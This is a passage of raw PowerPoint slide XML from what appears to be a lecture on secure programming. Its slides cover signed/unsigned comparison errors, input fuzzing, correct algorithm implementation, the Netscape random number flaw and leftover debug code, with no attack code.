                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>signed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unsigned</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Must </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>correctly interpret text</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>form…</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>…and then process</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>consistently</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>there are issues comparing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>signed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-130" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unsigned</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>positive unsigned is negative</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>signed</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could be used to thwart </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>check</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24</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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807967" y="1006855"/>
            <a:ext cx="2442210" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Input</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2077465"/>
            <a:ext cx="7964805" cy="4422140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="455930" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Powerful testing method using a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>large </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>range of  randomly generated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>inputs</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>whether </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>program/function correctly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-140" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>handles  abnormal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>inputs</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simple, free of assumptions,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cheap</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assists with reliability as well as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="763905" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Can also use templates to generate classes of  known problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>inputs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could then </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>miss </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bugs, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>so </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use random </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>well</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25</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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81148" y="1006855"/>
            <a:ext cx="4897755" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Writing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Safe Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069339" y="1925065"/>
            <a:ext cx="7959090" cy="4598670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="955040" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Next concern is processing of data by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>some  algorithm to solve required</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>problem</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Whether compiled to machine code or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>interpreted</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114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>have execution of machine</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>instructions</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And </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>manipulation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in memory and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>registers</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>issues: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correct algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>implementation</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correct machine instructions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>algorithm</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valid </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>manipulation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>data</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26</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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1981454" y="1006855"/>
            <a:ext cx="6097270" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Correct Algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2062226"/>
            <a:ext cx="6588759" cy="4417695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="58419" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="459"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Issue of good program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>development</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spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>correctly handle all problem</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variants</a:t>
            </a:r>
            <a:endParaRPr sz="30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i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cf. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Netscape </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>random number</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:endParaRPr sz="28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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>supposed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>be unpredictable, but</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>wasn’t</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>When debug/test code left in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>production</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to access </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
